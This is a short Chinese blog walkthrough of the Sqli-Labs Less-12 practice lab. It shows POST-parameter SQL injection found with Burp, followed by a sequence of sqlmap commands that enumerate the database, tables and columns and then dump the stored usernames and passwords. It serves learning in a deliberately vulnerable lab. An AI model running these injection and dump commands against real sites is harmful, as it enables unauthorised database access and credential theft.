Sqli-Labs Less12:POST注入
作者:互联网
打开bp抓包
发送至Repeater,添加 \ 进行测试
根据报错:222")
猜测查询语句:
select uname, passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)
根据猜测进行注入:
成功登陆。
使用sqlmap进一步测试
复制截取的数据包在kali中保存为新文件 sqli-labs-12
使用以下命令进行测试:
sqlmap -r sqli-labs-12 -p uname
发现无法与服务器建立连接,在思考后发现,截取的数据包中主机为 localhost ,而复制进kali后,就应该将 主机修改为 服务器的 ip :192.168.0.104
再次连接,成功
继续,奥里给,干了!
还是刚才的查询语句
sqlmap -r sqli-labs-12 -p uname
其中 -r 表示从文件读取数据(read)
-p 表示用于注入的参数
查看扫描结果:
出现了基于报错的注入,继续利用该类型的注入,指定注入类型为 error-based ,查询库内容
指定注入类型 E (error)
sqlmap -r sqli-labs-12 -p uname --technique E
查询当前数据库
sqlmap -r sqli-labs-12 -p uname --technique E --current-db
查询 security 库中的表
sqlmap -r sqli-labs-12 -p uname --technique E -D security --tables
查询 users 中的字段
qlmap -r sqli-labs-12 -p uname --technique E -D security -T users --columns
查询字段内容
sqlmap -r sqli-labs-12 -p uname --technique E -D security -T users -C "username, password" --dump
至此。
标签:sqlmap,labs,12,sqli,technique,Labs,Sqli,uname,POST 来源: https://blog.csdn.net/qq_43968080/article/details/104004170